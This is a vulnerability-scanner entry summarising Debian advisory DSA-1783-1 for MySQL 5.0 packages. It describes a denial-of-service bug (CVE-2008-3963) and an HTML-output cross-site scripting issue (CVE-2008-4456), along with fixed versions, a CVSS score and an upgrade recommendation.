| Description: | Summary:
The remote host is missing an update for the Debian 'mysql-dfsg-5.0' package(s) announced via the DSA-1783-1 advisory.
Vulnerability Insight:
Multiple vulnerabilities have been identified affecting MySQL, a relational database server, and its associated interactive client application. The Common Vulnerabilities and Exposures project identifies the following two problems:
CVE-2008-3963
Kay Roepke reported that the MySQL server would not properly handle an empty bit-string literal in an SQL statement, allowing an authenticated remote attacker to cause a denial of service (a crash) in mysqld. This issue affects the oldstable distribution (etch), but not the stable distribution (lenny).
CVE-2008-4456
Thomas Henlich reported that the MySQL commandline client application did not encode HTML special characters when run in HTML output mode (that is, 'mysql --html ...'). This could potentially lead to cross-site scripting or unintended script privilege escalation if the resulting output is viewed in a browser or incorporated into a web site.
For the old stable distribution (etch), these problems have been fixed in version 5.0.32-7etch10.
For the stable distribution (lenny), these problems have been fixed in version 5.0.51a-24+lenny1.
We recommend that you upgrade your mysql-dfsg-5.0 packages.
Affected Software/OS:
'mysql-dfsg-5.0' package(s) on Debian 4, Debian 5.
Solution:
Please install the updated package(s).
CVSS Score:
4.0
CVSS Vector:
AV:N/AC:L/Au:S/C:N/I:N/A:P
|
